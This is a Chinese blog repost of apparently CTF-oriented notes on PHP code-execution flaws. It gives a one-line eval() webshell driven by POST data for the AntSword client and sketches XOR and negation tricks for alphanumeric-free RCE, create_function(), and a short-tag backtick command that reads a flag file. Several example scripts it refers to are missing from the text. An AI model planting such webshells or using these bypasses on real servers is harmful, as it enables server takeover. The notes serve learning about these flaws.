代碼執行漏洞

eval()函數

<?php eval($_POST[0]);?>

eval會把接收到的字符串當作PHP代碼來執行（一句話木馬）

利用這個可以連接蟻劍，而連接密碼就是中括號中的值–$_POST[0]中就是這個‘0’作為連接密碼

無字母數字RCE

苛刻條件的 RCE

取反 、 異或 的繞過方法

比如下面的例子：

異或的方法：
XOR.php

執行就是 終端 php XOR.php
利用PHP7的特性—動態函數執行調用：

如果是system(ls)—一次是system 一次是ls
同理：

取反的方法：
qufan.php


hackbar中：

create_function()

create_function()函數有兩個參數$args和$code,用于創建一個lambda樣式的函數

create_function()已經漸漸被淘汰了

PS

過濾長度，括號。。。特別多東西的時候，可以嘗試：

?> 實現閉合

<? 是PHP的短標簽 <?= 表示<? echo 例如  就表示輸出abc 再接著看： ``一對反引號就是shell_exec執行系統命令 %20相當于 空格 執行的系統命令相當于： **/???/??? *** 其實就是/bin/cat 后面一個星 而*就是flag.php

總結

以上是生活随笔為你收集整理的代码执行漏洞-无字母数字RCE-create_function()的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。